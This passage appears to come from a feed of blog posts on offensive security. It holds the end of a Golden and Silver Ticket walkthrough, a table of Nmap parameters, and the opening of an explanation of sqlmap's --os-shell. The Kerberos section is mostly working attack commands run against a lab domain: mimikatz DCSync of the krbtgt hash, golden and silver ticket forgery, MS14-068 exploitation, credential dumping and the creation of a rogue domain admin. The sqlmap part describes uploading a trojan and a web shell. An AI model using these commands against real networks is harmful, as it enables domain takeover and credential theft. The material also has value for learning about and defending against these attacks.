<code>whoami</code> confirms the identity.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3raa2yei5ssykds6wvfb.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3raa2yei5ssykds6wvfb.png" alt=" " width="220" height="40"></a></p> <p>The NTLM hash of <code>krbtgt</code> is extracted using the following mimikatz commands:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>mimikatz<span class="o">(</span>commandline<span class="o">)</span> <span class="c"># privilege::debug</span> mimikatz<span class="o">(</span>commandline<span class="o">)</span> <span class="c"># lsadump::dcsync /domain:cyberpeace.com /all /csv</span> mimikatz<span class="o">(</span>commandline<span class="o">)</span> <span class="c"># lsadump::dcsync /domain:cyberpeace.com /user:krbtgt</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftj0p56h58vab3coyys8r.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftj0p56h58vab3coyys8r.png" alt=" " width="590" height="326"></a></p> <p>The SID of the <code>krbtgt</code> account is displayed in the output.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5937ui5jej3ouknplvh3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5937ui5jej3ouknplvh3.png" alt=" " width="535" height="216"></a></p> <p>Mimikatz is then employed to generate the Golden Ticket and save it as a <code>.kirbi</code> file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>mimikatz.exe <span class="s2">"kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi"</span> <span class="nb">exit</span> </code></pre> </div> <ul> <li> <code>/admin</code> : forged username</li> <li> <code>/domain</code> : domain name</li> <li> <code>/sid</code> : domain SID (note: the last component after the final hyphen is omitted)</li> <li> <code>/krbtgt</code> : NTLM hash of <code>krbtgt</code> </li> <li> <code>/ticket</code> : name of the generated ticket file</li> </ul> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnefe10t7ap6ooruk9e7l.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnefe10t7ap6ooruk9e7l.png" alt=" " width="800" height="145"></a></p> <h4> 3. Using the Golden Ticket (Creating a Domain Admin Account from a Standard Domain Account) </h4> <p>The attacker logs into the domain with an ordinary user account. Using mimikatz, the previously generated <code>ticket.kirbi</code> is loaded into memory:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">mimikatz</span><span class="w"> </span><span class="c"># kerberos::purge</span><span class="w"> </span><span class="n">mimikatz</span><span class="w"> </span><span class="c"># kerberos::ptt ticket.kirbi</span><span class="w"> </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftkredn349ltvr6jas0md.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftkredn349ltvr6jas0md.png" alt=" " width="365" height="112"></a></p> <p>At this point, an attempt to create a domain administrator account named <code>ccc</code> succeeds.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8u6sfitdwhd6bbcbau19.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8u6sfitdwhd6bbcbau19.png" alt=" " width="642" height="143"></a></p> <h2> Silver Ticket </h2> <h3> Principle </h3> <p>If the Golden Ticket represents a forged TGT, then the Silver Ticket corresponds to a forged Service Ticket (ST). During the third stage of Kerberos authentication, the Client presents the ST together with <code>Authenticator3</code> to a service hosted on a particular server. The server decrypts the ST using its own Master Key (derived from the service account’s hash) to obtain the Session Key. It then decrypts <code>Authenticator3</code> with that Session Key to verify the Client’s identity. If verification succeeds, the Client is granted access to the designated service. </p> <p>Thus, if an attacker knows the NTLM hash of the service account associated with the target server, a valid ST can be forged without any communication with the KDC. However, such a forged ticket is functional only for the specific service for which it was crafted.</p> <h3> Characteristics </h3> <ol> <li>Does not require interaction with the KDC.</li> <li>Requires the NTLM hash of the target service account.</li> </ol> <h3> Detailed Procedure </h3> <h4> 1. Forging Credentials to Escalate Privileges of a Domain User </h4> <p>Again, the attack begins from a local <code>Administrator</code> account on a domain‑joined host.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgwosz5hqezyi0lkafqko.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgwosz5hqezyi0lkafqko.png" alt=" " width="252" height="43"></a></p> <p>The command <code>net config workstation</code> reveals the domain name as <code>cyberpeace</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgxog8l3qubdjyzk3iq55.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgxog8l3qubdjyzk3iq55.png" alt=" " width="591" height="226"></a></p> <p>The domain controller hostname <code>scene</code> is obtained with <code>nltest /dsgetdc:domain</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8zwg41o4l7y5ccvpxe2.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8zwg41o4l7y5ccvpxe2.png" alt=" " width="427" height="145"></a></p> <p>Mimikatz is executed with administrator rights:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">mimikatz</span><span class="err">.exe</span> <span class="s2">"privilege::debug"</span> <span class="s2">"sekurlsa::logonpasswords"</span> <span class="s2">"exit"</span><span class="o">&gt;</span><span class="kd">log</span>.txt </code></pre> </div> <p>The log file shows a domain user account, <code>Hellen</code>, with the password <code>Hellen1818</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faezbgtmz4pe0j1aiw77t.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faezbgtmz4pe0j1aiw77t.png" alt=" " width="231" height="42"></a></p> <p>After logging in as <code>Hellen</code>, <code>whoami</code> confirms the user context.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0iwiprewrle71spfc8m5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0iwiprewrle71spfc8m5.png" alt=" " width="663" height="143"></a></p> <p>The presence of the MS14‑068 vulnerability is verified.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flbnarwtykc58pb3nnp3r.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flbnarwtykc58pb3nnp3r.png" alt=" " width="385" height="57"></a></p> <p>Access to the administrative share is initially denied.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy1qugmrm1xqo1gx93bn1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy1qugmrm1xqo1gx93bn1.png" alt=" " width="366" height="41"></a></p> <p>The exploit tool and mimikatz are uploaded, and the user’s SID is retrieved.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fymlbh63by3een5guzmxe.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fymlbh63by3een5guzmxe.png" alt=" " width="554" height="99"></a></p> <p>A ticket is forged with MS14‑068:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">MS14</span><span class="o">-</span><span class="m">068</span>.exe <span class="na">-u </span><span class="kd">Hellen</span>@cyberpeace.com <span class="na">-p </span><span class="kd">Hellen1818</span> <span class="na">-s </span><span class="kd">S</span><span class="o">-</span><span class="m">1</span><span class="o">-</span><span class="m">5</span><span class="o">-</span><span class="m">21</span><span class="o">-</span><span class="m">2718660907</span><span class="o">-</span><span class="m">658632824</span><span class="o">-</span><span class="m">2072795563</span><span class="o">-</span><span class="m">1110</span> <span class="na">-d </span><span class="kd">DomainControl</span>.cyberpeace.com </code></pre> </div> <p>The generic syntax is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">ms14</span><span class="o">-</span><span class="m">068</span>.exe <span class="na">-u </span><span class="o">&lt;</span><span class="kd">domain_user</span><span class="o">&gt;</span>@&lt;domain&gt; <span class="na">-p </span><span class="o">&lt;</span><span class="kd">password</span><span class="o">&gt;</span> <span class="na">-s </span><span class="o">&lt;</span><span class="kd">user_SID</span><span class="o">&gt;</span> <span class="na">-d </span><span class="o">&lt;</span><span class="kd">domain_controller</span><span class="o">&gt;</span> </code></pre> </div> <p>Inside mimikatz, the old tickets are purged and the forged ticket is imported:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">mimikatz</span><span class="w"> </span><span class="c"># kerberos::purge</span><span class="w"> </span><span class="n">mimikatz</span><span class="w"> </span><span class="c"># kerberos::ptc &lt;path_to_ticket_file&gt;</span><span class="w"> </span></code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8g0hmbz2vefi1qkev9mk.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8g0hmbz2vefi1qkev9mk.png" alt=" " width="639" height="287"></a></p> <p>The command <code>dir \\scene.cyberpeace.com\c$</code> now succeeds, indicating domain administrator privileges.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw4964pc6l8w0c4z88g.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw4964pc6l8w0c4z88g.png" alt=" " width="486" height="223"></a></p> <p>A domain administrator account <code>ccc</code> is created:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>net user ccc Qwe1234 /add /domain net group <span class="s2">"Domain Admins"</span> cccc /add /domain </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhuz1c8s0rdu8o4ce7mq.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhuz1c8s0rdu8o4ce7mq.png" alt=" " width="637" height="138"></a></p> <h4> 2. Forging a Silver Ticket </h4> <p>Logging in as the newly created domain administrator, mimikatz is run with administrator privileges to extract the necessary SID and NTLM hash:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="kd">mimikatz</span><span class="err">.exe</span> <span class="s2">"privilege::debug"</span> <span class="s2">"sekurlsa::logonpasswords"</span> <span class="s2">"exit"</span><span class="o">&gt;</span><span class="kd">log</span>.txt </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh08cpw0rfcsasrnko1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh08cpw0rfcsasrnko1.png" alt=" " width="595" height="372"></a></p> <p>The hash and mimikatz are then copied to a local account on a domain‑joined machine. After purging the existing ticket cache, the silver ticket is forged and passed directly into the session using the following command:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt </code></pre> </div> <p>The general usage pattern is:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight powershell"><code><span class="n">kerberos::golden</span><span class="w"> </span><span class="nx">/domain:</span><span class="err">&lt;</span><span class="nx">domain</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">/sid:</span><span class="err">&lt;</span><span class="nx">domain_SID</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">/target:</span><span class="err">&lt;</span><span class="nx">target_server</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">/service:</span><span class="err">&lt;</span><span class="nx">service_type</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">/rc4:</span><span class="err">&lt;</span><span class="nx">NTLM_hash</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">/user:</span><span class="err">&lt;</span><span class="nx">username</span><span class="err">&gt;</span><span class="w"> </span><span class="nx">/ptt</span><span class="w"> </span></code></pre> </div> <p>The <code>&lt;username&gt;</code> may be chosen arbitrarily.</p> <p>Since no TGT is available to repeatedly request tickets, the attacker must target a specific service. The service type can be selected from the list below.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F72p168t65c598tn7k30b.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F72p168t65c598tn7k30b.png" alt=" " width="623" height="313"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpmweggbpsr7rdbwt5dia.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpmweggbpsr7rdbwt5dia.png" alt=" " width="637" height="398"></a></p> <p>The command <code>dir \\scene.cyberpeace.com\c$</code> executes successfully, and a domain administrator account can be created.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9hdr2mye089z7fulr0ax.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9hdr2mye089z7fulr0ax.png" alt=" " width="641" height="343"></a></p> <h2> Differences between Golden and Silver Tickets </h2> <h3> Scope of Access </h3> <ul> <li> <strong>Golden Ticket</strong>: Forges a TGT, thereby granting access to any Kerberos‑protected service.</li> <li> <strong>Silver Ticket</strong>: Forges an ST, granting access only to the specific service for which it was crafted (e.g., CIFS).</li> </ul> <h3> Authentication Flow </h3> <ul> <li> <strong>Golden Ticket</strong>: Interacts with the KDC but does not interact with the AS.</li> <li> <strong>Silver Ticket</strong>: Does not interact with the KDC at all; it communicates directly with the target server.</li> </ul> <h3> Encryption Mechanism </h3> <ul> <li> <strong>Golden Ticket</strong>: Encrypted with the NTLM hash of <code>krbtgt</code>.</li> <li> <strong>Silver Ticket</strong>: Encrypted with the NTLM hash of the service account associated with the target server.</li> </ul> ticket passing attacks cybersecurity Common Nmap Parameters Excalibra Tue, 09 Jun 2026 23:21:22 +0000 https://dev.to/excalibra/common-nmap-parameters-1815 https://dev.to/excalibra/common-nmap-parameters-1815 <p>The following table lists frequently used Nmap parameters along with their descriptions in an academic context.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Parameter</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td><code>-sT</code></td> <td>TCP connect() scan. This method records a large number of connection requests and error messages in the target host’s logs.</td> </tr> <tr> <td><code>-sS</code></td> <td>Half-open scan. Few systems log this activity; however, root privileges are required.</td> </tr> <tr> <td> <code>-sF</code>, <code>-sN</code> </td> <td>Stealth FIN packet scan, Xmas Tree scan, and Null scan modes.</td> </tr> <tr> <td><code>-sP</code></td> <td>Ping scan. Nmap employs a ping scan by default when scanning ports; only if the host is alive will Nmap continue scanning.</td> </tr> <tr> <td><code>-sU</code></td> <td>UDP scan. UDP scans are inherently unreliable.</td> </tr> <tr> <td><code>-sA</code></td> <td>This advanced scanning method is typically used to traverse firewall rule sets.</td> </tr> <tr> <td><code>-sV</code></td> <td>Probe port service versions.</td> </tr> <tr> <td><code>-Pn</code></td> <td>Ping is not required prior to scanning. Some firewalls block ping commands; this option can be used to bypass that restriction.</td> </tr> <tr> <td><code>-v</code></td> <td>Display the scanning process. Recommended for verbose output.</td> </tr> <tr> <td><code>-h</code></td> <td>Help option. Provides the clearest and most comprehensive help documentation.</td> </tr> <tr> <td><code>-p</code></td> <td>Specify ports, for example: <code>1-65535</code>, <code>1433</code>, <code>135</code>, <code>22</code>, <code>80</code>, etc.</td> </tr> <tr> <td><code>-O</code></td> <td>Enable remote operating system detection. False positives may occur.</td> </tr> <tr> <td><code>-A</code></td> <td>Comprehensive system detection, enabling script detection and advanced scanning.</td> </tr> <tr> <td> <code>-oN</code> / <code>-oX</code> / <code>-oG</code> </td> <td>Write the report to a file in three respective formats: normal, XML, and grepable.</td> </tr> <tr> <td><code>-T4</code></td> <td>For TCP ports, disable dynamic scan delays exceeding 10 ms.</td> </tr> <tr> <td><code>-iL</code></td> <td>Read a list of hosts from a file, for example: <code>-iL C:\ip.txt</code>.</td> </tr> </tbody> </table></div> <h2> Practical Examples </h2> <ul> <li><p><strong>Scan open ports on a specified IP address:</strong><br><br> <code>nmap -sS -p 1-65535 -v XXX.XXX.XXX.XXX</code></p></li> <li><p><strong>Scan live hosts in a /24 subnet:</strong><br><br> <code>nmap -sP XXX.XXX.XXX.XXX/24</code></p></li> <li><p><strong>Scan specific ports:</strong><br><br> <code>nmap -p 80,1433,22,1521 XXX.XXX.XXX.XXX</code></p></li> <li><p><strong>Detect the host operating system:</strong><br><br> <code>nmap -O XXX.XXX.XXX.XXX</code></p></li> <li><p><strong>Comprehensive system detection:</strong><br><br> <code>nmap -v -A XXX.XXX.XXX.XXX</code><br><br> <em>Note: By default, Nmap scans 1,000 high-risk ports.</em></p></li> <li><p><strong>Scan a specified IP range:</strong><br><br> <code>nmap XXX.XXX.XXX.XXX-XXX</code></p></li> <li><p><strong>Penetrate a firewall for scanning (when ping is blocked):</strong><br><br> <code>nmap -Pn -A XXX.XXX.XXX.XXX</code></p></li> <li><p><strong>Use a script to scan web‑sensitive directories:</strong><br><br> <code>nmap -p 80 --script=http-enum.nse XXX.XXX.XXX.XXX</code></p></li> </ul> nmap cybersecurity parameters common The Principle of sqlmap’s `--os-shell Excalibra Tue, 09 Jun 2026 22:22:33 +0000 https://dev.to/excalibra/the-principle-of-sqlmaps-os-shell-3mb4 https://dev.to/excalibra/the-principle-of-sqlmaps-os-shell-3mb4 <h2> Preface </h2> <p>When the database is MySQL, PostgreSQL, or Microsoft SQL Server, and the current user possesses the privileges required to invoke specific functions, sqlmap can be used to obtain an operating system shell.</p> <p>In the case of MySQL and PostgreSQL, sqlmap uploads a binary library containing user-defined functions, <code>sys_exec()</code> and <code>sys_eval()</code>. These two functions, once created, are capable of executing system commands.</p> <p>For Microsoft SQL Server, sqlmap employs the <code>xp_cmdshell</code> stored procedure. If this procedure is disabled (it is disabled by default in Microsoft SQL Server 2005 and later), sqlmap will attempt to re‑enable it; if it does not exist, sqlmap will create it automatically.</p> <p>The following sections illustrate the principles behind the <code>--os-shell</code> feature by examining injection scenarios and direct database connections for SQL Server and MySQL.</p> <h2> Injection-Based <code>--os-shell</code> </h2> <p><strong>Prerequisites:</strong></p> <ul> <li>Write access to the web server’s document root.</li> <li>The <code>secure_file_priv</code> variable is either empty or set to a writable path.</li> </ul> <p>During a standard SQL injection, <code>--os-shell</code> operates primarily by uploading a sqlmap trojan, which is subsequently used to execute commands.</p> <h3> Test Environment </h3> <ul> <li>Operating system: Microsoft Windows Server 2012 Standard </li> <li>Database: MySQL 5.1.60 </li> <li>Scripting language: PHP 5.4.45 </li> <li>Web server: Apache 2.4.39 </li> </ul> <p>Initially, sqlmap is employed to detect the injection point.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhiz1r6uvb419gmx4ren8.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhiz1r6uvb419gmx4ren8.png" alt=" " width="799" height="273"></a></p> <p>The <code>--os-shell</code> flag is then invoked.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj5ohdhk9puufxjb1sc0q.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj5ohdhk9puufxjb1sc0q.png" alt=" " width="799" height="250"></a></p> <p><strong>At this stage, sqlmap performs three key actions:</strong></p> <ol> <li>Probes the target to gather basic information. </li> <li>Uploads a shell to the target web server. </li> <li>Removes the shell upon exiting.</li> </ol> <p>A packet capture with Wireshark, filtered to display only HTTP traffic, reveals the sequence.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxd76v3exle17w29rpsz3.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxd76v3exle17w29rpsz3.png" alt=" " width="799" height="179"></a></p> <p><strong>Step 1 – sqlmap uploads a trojan that provides file‑upload functionality.</strong></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsn19cn6pkasjuw2c3fgx.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsn19cn6pkasjuw2c3fgx.png" alt=" " width="800" height="92"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhtrp73yb3szu32v6myjd.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhtrp73yb3szu32v6myjd.png" alt=" " width="800" height="69"></a></p> <p>Following the HTTP stream reveals URL‑encoded content. Once decoded, it is apparent that the file is written to disk using <code>INTO OUTFILE</code>. The trojan’s code is hex‑encoded; decoding it exposes an upload‑capable script.</p> <p><strong>Step 2 – The uploaded trojan is used to transfer the actual shell.</strong></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmp9f1c1icusj4ds1wu0o.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmp9f1c1icusj4ds1wu0o.png" alt=" " width="800" height="222"></a></p> <p>Tracking the HTTP stream shows the shell’s source code in the request body.</p> <p><strong>Step 3 – Commands are passed to the shell for execution.</strong></p> <p><a 